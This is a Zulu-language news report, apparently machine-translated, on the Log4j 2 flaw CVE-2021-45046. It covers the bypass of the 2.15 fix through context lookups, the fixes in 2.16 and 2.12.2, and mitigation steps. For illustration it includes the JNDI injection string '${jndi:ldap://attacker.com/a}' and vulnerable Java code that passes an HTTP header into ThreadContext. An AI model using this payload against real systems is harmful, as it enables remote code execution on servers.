Obunye ubungozi buphawulwe ekusetshenzisweni kokushintshwa kwe-JNDI kulabhulali ye-Log4j 2 (CVE-2021-45046), okwenzeka naphezu kokulungiswa okungezwe ekukhishweni okungu-2.15 futhi ngokunganaki ukusetshenziswa kwesilungiselelo se-"log4j2.noFormatMsgLookup" ukuze kuvikelwe. Inkinga iyingozi ikakhulukazi ezinguqulweni ezindala ze-Log4j 2, evikelwe kusetshenziswa ifulegi elithi "noFormatMsgLookup", njengoba lenza kube nokwenzeka ukweqa isivikelo esengozini yangaphambilini (Log4Shell, CVE-2021-44228) ekuvumela ukuthi usebenzise ikhodi yakho iseva. Kubasebenzisi benguqulo engu-2.15, ukuxhashazwa kukhawulelwe ekudaleni izimo zokuphahlazeka kohlelo lokusebenza ngenxa yokukhathala kwezisetshenziswa ezitholakalayo.
Ubungozi buvela kuphela kumasistimu asebenzisa i-Context Lookups njenge-${ctx:loginId} noma i-Thread Context Maps njenge-%X, %mdc, ne-%MDC ukuze ungene. Umsebenzi wehlela ekudaleni izimo zokukhipha idatha equkethe okushintshiwe kwe-JNDI kulogi lapho kusetshenziswa imibuzo yomongo noma izifanekiso ze-MDC kuhlelo lokusebenza ezichaza imithetho yokufometha okukhiphayo kulogi.
Abacwaningi abavela ku-LunaSec baphawule ukuthi ezinguqulweni ze-Log4j ezingaphansi kuka-2.15, lobu bungozi bungasetshenziswa njengevekhtha entsha yokuhlasela kwe-Log4Shell okuholela ekwenzeni ikhodi uma izinkulumo ze-ThreadContext zisetshenziswa uma kukhishelwa ilogu, lapho idatha yangaphandle ingena khona, kungakhathaliseki ukuthi ikuphi. ukufakwa ukuze kuvikelwe ifulegi elithi "MsgFormatLookups" noma isifanekiso "%m{nolookups}".
I-bypass yokuvikela yehla eqinisweni lokuthi esikhundleni sokushintsha ngokuqondile "${jndi:ldap://attacker.com/a}", lesi sisho sithathelwa indawo ngevelu yokuhluka okumaphakathi okusetshenziswe emithethweni yokufometha okukhiphayo ku- log. Isibonelo, uma umbuzo womongo othi ${ctx:apiversion} usetshenziswa lapho kukhishelwa ilogu, ukuhlasela kungenziwa ngokushintshanisa idatha ethi "${jndi:ldap://attacker.com/a}" ku- inani elibhalwe ku-apiversion variable. Isibonelo sekhodi esengozini: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") public String index(@RequestHeader("X-Api-Version") String apiVersion) {// Inani lesihloko se-HTTP "X-Api-Version" lidluliselwa ku-ThreadContext ThreadContext.put("apiversion" , apiVersion ); // Lapho ukhishelwa kulogu, inani langaphandle le-piversion lizocutshungulwa kusetshenziswa esikhundleni se-${ctx:apiversion} logger.info("Ithole isicelo senguqulo ye-API"); buya "Sawubona, mhlaba!"; }
Ku-Log4j 2.15, ukuba sengozini kungase kusetshenziswe ukwenza ukuhlasela kwe-DoS uma kudluliswa amanani ku-ThreadContext okungadala iphethini yokufometha okukhiphayo ukuthi ihambe.
Izibuyekezo 2.16 kanye 2.12.2 zishicilelwe ukuze kuvinjwe ukuba sengozini. Egatsheni le-Log4j 2.16, ngaphezu kokulungiswa okusetshenziswe kunguqulo 2.15 nokubophezela imibuzo ye-JNDI LDAP kokuthi "i-localhost", ukusebenza kwe-JNDI kukhutshazwe ngokuphelele ngokuzenzakalela futhi usekelo lwamaphethini okushintsha umlayezo kususiwe. Njengendlela yokuphepha, kuphakanyiswa ukuthi kususwe ikilasi le-JndiLookup endleleni yekilasi (isibonelo, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class") .
Ungakwazi ukulandelela ukubonakala kokulungiswa kwamaphakheji emakhasini okusatshalaliswa (i-Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) kanye nabakhiqizi bepulatifomu ye-Java (GitHub, Docker, Oracle, vmWare, Broadcom kanye ne-Amazon / AWS, Juniper, VMware, Cisco, IBM , Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, njll.).
Source: opennet.ru